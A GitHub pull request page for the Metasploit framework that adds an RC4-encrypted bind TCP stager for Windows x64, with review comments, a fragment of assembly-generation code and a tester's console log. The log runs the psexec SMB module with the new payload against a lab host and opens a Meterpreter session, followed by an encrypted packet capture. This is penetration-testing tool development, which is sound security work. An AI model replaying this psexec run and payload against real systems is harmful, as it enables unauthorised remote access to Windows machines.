Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Implement bind TCP with RC4 decryption for x64 #11944

Merged
merged 2 commits into from Jun 13, 2019

Conversation

Projects
None yet
4 participants
@sempervictus
Copy link
Contributor

commented Jun 3, 2019

Update metasm generated shellcode blocks to cobble together an
RC4 decryption routine with a bind-socket handler for x64 targets.
Expose via new payload module

RageLtMan
Implement bind TCP with RC4 decryption for x64
Update metasm generated shellcode blocks to cobble together an
RC4 decryption routine with a bind-socket handler for x64 targets.
Expose via new payload module
@sempervictus

This comment has been minimized.

Copy link
Contributor Author

commented Jun 3, 2019

Bah, already in cab to airport. If someone could please update cached sizes, would greatly appreciate it (usual problem, even if I did run it, the sizes don't match between fork and master, so I'd need to create a gemset for master-branch-instance just to run the tool in the correct context).
Ping @acammack-r7

return asm
end

def asm_block_recv(opts={})

asm << %Q^

This comment has been minimized.

Copy link
@bwatters-r7

bwatters-r7 Jun 4, 2019

Contributor

Since you encapsulated this in the method, you'll need this to change to asm = %Q^
Pretty sure that's why sanity tests are failing on meterpreter/bind_tcp.

@bwatters-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 4, 2019

I'd already fixed it locally to check, so feel free to take or ignore this: sempervictus#26

@bwatters-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 4, 2019

@sempervictus other than the two catches noted, this looks good to me. Let me know if you just want me to push the fixed branch here and land it.

msf5 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                192.168.134.120  yes       The target address range or CIDR identifier
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               [redacted]          no        The password for the specified username
   SMBUser               [redacted]          no        The username to authenticate as


Payload options (windows/x64/meterpreter/bind_tcp_rc4):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   EXITFUNC     thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT        4567             yes       The listen port
   RC4PASSWORD  secret           yes       Password to derive RC4 key from
   RHOST        192.168.134.120  no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/smb/psexec) > run

[*] 192.168.134.120:445 - Connecting to the server...
[*] 192.168.134.120:445 - Authenticating to 192.168.134.120:445 as user '[redacted]'...
[!] 192.168.134.120:445 - No active DB -- Credential data will not be saved!
[*] 192.168.134.120:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 192.168.134.120:445 - PowerShell found
[*] 192.168.134.120:445 - Selecting PowerShell target
[*] 192.168.134.120:445 - Powershell command length: 2748
[*] 192.168.134.120:445 - Executing the payload...
[*] 192.168.134.120:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.134.120[\svcctl] ...
[*] 192.168.134.120:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.134.120[\svcctl] ...
[*] 192.168.134.120:445 - Obtaining a service manager handle...
[*] 192.168.134.120:445 - Creating the service...
[+] 192.168.134.120:445 - Successfully created the service
[*] 192.168.134.120:445 - Starting the service...
[+] 192.168.134.120:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.134.120:445 - Removing the service...
[+] 192.168.134.120:445 - Successfully removed the service
[*] 192.168.134.120:445 - Closing service handle...
[*] Started bind TCP handler against 192.168.134.120:4567
[-] The connection was refused by the remote host (192.168.134.120:4567).
[*] Sending stage (206407 bytes) to 192.168.134.120
[*] Meterpreter session 4 opened (192.168.135.168:43744 -> 192.168.134.120:4567) at 2019-06-04 16:50:29 -0500

Pcap:

.....Y6.I`.i.N.U.d:s.H...\.....<r...../..#.....F.`7%.,!-..}pCh..AE(c.s....%....o........j....*L.>.YrL\T.......$0...p...=.Kz.[2=U8.A..CB....I.X....3.i+..9.....C......Gq.{...c3|N[...yB...&.W..KD.*......Hv.. .h..t.3M.{<..tEI.... k..c....Z...I;23_]@......N.&.`.oIn).....^...$.~..Xs...'.I.....H....T.T.].........9.w$`>....)...F~R....ckA..(...m....W.w..L.|E..j..|.3d[.>.-..l.
.......LQ..d6.R...hwu1.=.j...x[..1K..s.'..L...O..:5f^.z.w..H.1...L.~..i.Y.....\)	.RL.9..... .	.p}.......c..C.4+..I.(&....15. .N"^,...U....g.Y2.x.J{.E_.o.gt...O^.v....2......n.[Z?..`+...	..h
..#;.J.J..../.....>Y9.sF.......GP...n.A..T>I.xL{.../.g.!.E...L..e.........]...[!..R.	&T..d.?...}t...........g........w.].......!P.=.=...........m.[............pk...kSC=.....S..{	.}s..0..O..?@l.+o.a}?....'.OAm.G.C..h.k((Q(HCy.4 . T.....
.hT........E.Z....z...B..	a2#U..nZ.
..b{A|........=.v9....a.....,...i..T	.....Ee.t	.....&....,.dm.}.Z.L%.[..O..U...e...&....Oc*..9....X,{..*8.._3N.sV...{Hj.1...'....6h.......M..t...i.	.....@..;.M.....A...c...-.d..3AS5a...P...M.I..>.......eV..>c#
..T.....&.....S.g..to._.s.h.R=].Y..*.t96|g..[..3.S.....k....V4.G\....,..C.......(.;.A:..
.33..i0!,.GMo9...._..k.|Ml|.....-.............f....
..\.Y..lmY.....s...E9t.P.N6..I.-].V.hjjt.J.b...+n.....j..f..$.J....#.l...n.....e..q.p|".&{._...........Y$.$..L[...f...|i..ZI&u.....e.VWd..P.T..g...m.;.X..eY.[
o...w..'4.@3(..N..6..Y.Q.....%K......&&.Q.,F.F.....9..|....2.|^P...
.....xj.a......]Wt..2r..W..y......... .T ..y..^w.v.......|[....#..<bm.c..|3H.gew....._....c$..&...u.8...O!....QX.0.~.N...a..,T.`E2.........*.....!\.G|..y.o.y...I.-q..W.x..O..HaOl+.. .O..}?.s...Hd..F.....8d...8..WlM>....\S...-5K..8..!.J/..<.6	..<`...6nC!N..=.S.Z,.$.J{.b@..F.T.;.
.i04yt.Gt%..mI..^..{fO..LF..n..j..U`...q..j]a.|5.jZ........5.W...t8F.<..	.
.K-`..F.....K.?...q.)<X}...s..1.......N.Dv.cSaB.|....._.?....+QE.k|
.vh3.....T.....C..vq..\.b..
y.L..u..<52.h..E9............|...,.t$...*.)....r........s..Yv.wi...^.yA..Vx.7.Y.....K=.....1I.=...|.../J.........\...E.U?...F_...k?..0..W .|Tk.>....\..-...6...[.e.Av..2...e.T&..a.q..BA@.	Bv..R..U6.....>....)..E.....z .1...-CJ...t ..|..
F:.I ...7.p..W.B..|.....Od..0..T......Yt.............m6...o..J F....K...4....'....J4.u..
....l.'..w.N........#tp.>X..".........3.`.....X...BV.f..$..R%..........?...d...v....Gn......H... K..Z,.17...+MU1+.$L..._$. .B.\.>....	N......#sNO.ab7....P.9..X.....;.p.&..C9vL.j.:.qA...........<.....R...." K.y.=..K...6..il..H....."..n..Y.r......(......[b...s.....J(P.6....o......G..$.".s.f.YA... v.x..}(.f.I...2z:.7...."ci....p..."....I..p.......HH...WFv.......i...p..'.......C.PAen.2v...9.H.......z...h..G./XY.= ~.jU....cvCH

@bwatters-r7 bwatters-r7 self-assigned this Jun 4, 2019

@bwatters-r7 bwatters-r7 merged commit bee013a into rapid7:master Jun 13, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

bwatters-r7 added a commit that referenced this pull request Jun 13, 2019

Land #11944, Implement bind TCP with RC4 decryption for x64
Merge branch 'land-11944' into upstream-master
@bwatters-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 13, 2019

Release Notes

A new RC4 encrypted bind_tcp stager has been added for Windows x64.

msjenkins-r7 added a commit that referenced this pull request Jun 13, 2019

Land #11944, Implement bind TCP with RC4 decryption for x64
Merge branch 'land-11944' into upstream-master
@h00die

This comment has been minimized.

Copy link
Contributor

commented Jun 13, 2019

This is most excellent, just pinged @sempervictus yesterday about this being missing

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.